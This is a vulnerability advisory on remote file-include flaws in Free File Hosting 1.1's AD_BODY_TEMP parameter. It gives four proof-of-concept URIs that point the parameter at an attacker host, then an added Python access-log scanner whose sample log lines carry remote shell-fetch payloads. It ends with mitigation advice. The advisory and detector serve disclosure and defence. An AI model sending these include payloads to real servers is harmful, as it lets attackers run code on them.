Free File Hosting System Multiple Remote File Include Vulnerabilities
BID:23118
Info
| Bugtraq ID: | 23118 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-5763 CVE-2006-5764 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2007 12:00AM |
| Updated: | Mar 27 2007 09:53PM |
| Credit: | IbnuSina & jipank are credited with the discovery of these vulnerabilities. |
| Vulnerable: | Free PHP Scripts Free File Hosting 1.1 |
| Not Vulnerable: | |
Discussion
Free File Hosting is prone to multiple remote file-include vulnerabilities because several of its scripts use the user-supplied AD_BODY_TEMP request parameter in a file include without validating it.
Exploiting these issues allows a remote attacker to make the application include and execute server-side code fetched from an attacker-controlled host, in the security context of the web server. This can compromise the application and the underlying system; other attacks are also possible.
Version 1.1 is vulnerable to these issues.
This BID originally reported Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.
Exploit / POC
Attackers can use a browser to exploit these issues; no authentication is required. In the proof-of-concept URIs below, www.example.com stands for the vulnerable installation and www.example2.com for an attacker-controlled host serving the code to be included.
The following proof-of-concept URIs are available:
http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/forgot_pass.php?AD_BODY_TEMP=http://www.example2.com
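The following is an added example, not code from the Free File Hosting package or from the original advisory: a scanner for web server access logs that flags requests sending a remote URL (or a PHP stream wrapper) in AD_BODY_TEMP to any of the four scripts listed above. The log lines, the RFC 5737 IP addresses and the host evil.example are constructed for the example; the schemes beyond the PoC's http:// (ftp, data, php, expect, phar) are an assumption about what a scanner should also catch, not vectors the advisory states.

```python
"""Flag remote-file-include attempts against AD_BODY_TEMP in access logs.

Added example; not code from Free File Hosting or the advisory.
"""
import re
from urllib.parse import parse_qs, unquote

# The four scripts the advisory lists as reading AD_BODY_TEMP from the request.
AFFECTED_SCRIPTS = {"contact.php", "login.php", "register.php", "forgot_pass.php"}
PARAM = "AD_BODY_TEMP"  # PHP's $_GET keys are case-sensitive, so match exactly

# Apache/nginx "combined" log format. The sample lines further down are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Schemes and stream wrappers that turn include() into a fetch of attacker-
# controlled content. The advisory's PoC uses http://; the others are general
# RFI vectors added here as an assumption about what to catch as well.
REMOTE_SCHEME_RE = re.compile(r"^\s*(https?|ftps?|data|php|expect|phar)\s*:", re.IGNORECASE)


def decode_value(value: str) -> str:
    """Decode twice so double-URL-encoded payloads are seen in the clear."""
    return unquote(unquote(value))


def is_rfi_value(value: str) -> bool:
    """True if the decoded value would make PHP include a remote or wrapper resource."""
    return bool(REMOTE_SCHEME_RE.match(decode_value(value)))


def classify_request(target: str):
    """Return (script, decoded_include_target) when the request sends an
    RFI-looking AD_BODY_TEMP to an affected script, otherwise None."""
    path, _, query = target.partition("?")
    # Lower-cased only for matching, so probes like /Login.php are not missed.
    script = path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED_SCRIPTS:
        return None
    # parse_qs percent-decodes once; decode_value strips a second layer.
    for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        if is_rfi_value(value):
            return script, decode_value(value)
    return None


def scan_access_log(lines):
    """Return one alert dict per log line that looks like an exploitation attempt."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = classify_request(m.group("target"))
        if hit is None:
            continue
        script, include_target = hit
        alerts.append({
            "ip": m.group("ip"),
            "script": script,
            "include": include_target,
            # The status alone does not say whether the include succeeded
            # (a failed remote fetch can still return 200); keep it for triage.
            "status": int(m.group("status")),
        })
    return alerts


# Constructed sample log lines (documentation addresses; not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Mar/2007:10:01:02 +0000] "GET /contact.php?AD_BODY_TEMP=http://198.51.100.7/shell.txt? HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Mar/2007:10:01:03 +0000] "GET /login.php?AD_BODY_TEMP=http%3A%2F%2F198.51.100.7%2Fshell.txt HTTP/1.1" 200 5120',
    '198.51.100.22 - - [24/Mar/2007:10:02:10 +0000] "GET /register.php?AD_BODY_TEMP=header.php HTTP/1.1" 200 3000',
    '192.0.2.9 - - [24/Mar/2007:10:03:44 +0000] "GET /index.php?page=1 HTTP/1.1" 200 1200',
    '203.0.113.5 - - [24/Mar/2007:10:04:00 +0000] "GET /forgot_pass.php?AD_BODY_TEMP=%2568%2574%2574%2570%253A%252F%252Fevil.example%2Fx HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log, the scanner reports the contact.php and login.php requests carrying a plain and a single-encoded http:// URL, and the double-encoded forgot_pass.php request, while the legitimate register.php request with a local template name is ignored. Double decoding matters because a single-decode match on `http:` misses payloads encoded twice, and the same attacker IP repeating across the four scripts is the pattern to look for when this PoC is run from a scanner.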
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
As a general mitigation not supplied by the vendor, setting allow_url_include = Off (and allow_url_fopen = Off where the application does not need it) in php.ini prevents include and require from fetching remote URLs. This blocks the remote vector only; the same unvalidated parameter may still be usable to include local files, so AD_BODY_TEMP should also be restricted to an allowlist of known template names.
References
References:
- File Upload System Web Site (File Upload System)
- Free PHP Scripts Homepage (Free PHP Scripts)
- File Upload System V1.0 (AD_BODY_TEMP) multiple file include ([email protected])